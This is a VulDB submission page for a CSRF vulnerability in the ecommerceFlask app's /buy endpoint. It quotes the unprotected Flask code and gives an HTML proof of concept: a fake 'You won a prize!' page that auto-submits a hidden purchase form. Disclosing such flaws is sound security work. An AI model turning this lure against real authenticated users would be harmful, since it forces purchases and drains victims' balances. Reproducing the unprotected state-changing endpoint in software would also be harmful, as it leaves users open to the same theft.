Submit #850853: imhamzaazam ecommerceFlask v1.0 CSRFinfo

Titleimhamzaazam ecommerceFlask v1.0 CSRF
Description# CSRF Vulnerability in Forced Purchase (/buy) ## Summary A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the purchase endpoint `/buy`. The lack of CSRF protection in both the application configuration and endpoint implementation allows attackers to force an authenticated victim to purchase a product, deducting the victim's account balance and creating an order without authorization. ## Vulnerability Details ### Configuration-Level Issue **File**: `application.py` (Lines 24-31) ```python # Configure session to use filesystem (instead of signed cookies) app.config["SESSION_FILE_DIR"] = mkdtemp() app.config["SESSION_PERMANENT"] = False app.config["SESSION_TYPE"] = "filesystem" Session(app) # ❌ No CSRF protection mechanism configured (no Flask-WTF / CSRFProtect) # ❌ No SESSION_COOKIE_SAMESITE configured on the session cookie db = SQL("sqlite:///ecommDb.db") ``` Authentication relies solely on the session cookie via `helpers.py`: ```python def login_required(f): @wraps(f) def decorated_function(*args, **kwargs): if session.get("user_id") is None: # ❌ cookie-only authorization return redirect("/login") return f(*args, **kwargs) return decorated_function ``` ### Endpoint-Level Code Analysis **File**: `application.py` (Lines 48-72) ```python @app.route("/buy", methods=["GET", "POST"]) @login_required def buy(): if request.method == "POST": product = request.form.get("product") rows = db.execute("Select * from products where product_name= :name", name=product) quantity = int(request.form.get("quantity")) # ❌ No CSRF token validation # ❌ No Origin/Referer verification db.execute("Update users set cash = cash - :bought where id = :id", bought=rows[0]["product_price"], id=session["user_id"]) # ⚠️ deducts balance db.execute("insert into invoice(...) values (...)") # ⚠️ creates order db.execute("Update products set product_stock = product_stock - :count where product_name=:name", name=product, count=quantity) return redirect(url_for("index")) ``` **Security Issues**: 1. ❌ No CSRF token validation 2. ❌ No origin verification 3. ⚠️ Performs a financial state change (balance deduction + order creation) based only on the session cookie ## Proof of Concept (PoC) ```html <!DOCTYPE html> <html> <head> <title>You won a prize!</title> </head> <body> <h2>???? Congratulations! Claim your reward</h2> <p>Loading your reward...</p> <form id="csrf-form" action="http://127.0.0.1:5000/buy" method="POST"> <input type="hidden" name="product" value="EXISTING_PRODUCT_NAME"> <input type="hidden" name="quantity" value="1"> </form> <script> setTimeout(function() { document.getElementById('csrf-form').submit(); }, 1000); </script> </body> </html> ``` **Verified result** (local deployment): a cross-site, tokenless `/buy` request was accepted (HTTP 302) and the victim balance dropped from `10000.0` to `9900.0`. ## Impact **Victim balance theft / forced purchase** - Attackers can force an authenticated user to spend their balance on an arbitrary (attacker-defined) product, causing direct financial loss and fraudulent orders. --- **CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N` **CWE**: CWE-352 (Cross-Site Request Forgery) --- **Reported by**: flashzyc **Date**: 2026-06-07
Source⚠️ https://github.com/imhamzaazam/ecommerceFlask/issues/1
User
 flashzyc (UID 92850)
Submission06/07/2026 08:11 (29 days ago)
Moderation07/05/2026 20:36 (29 days later)
StatusAccepted
VulDB entry376394 [imhamzaazam ecommerceFlask up to cb7d9e24c30a99379651b7493b32048126ef402b cross-site request forgery]
Points20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!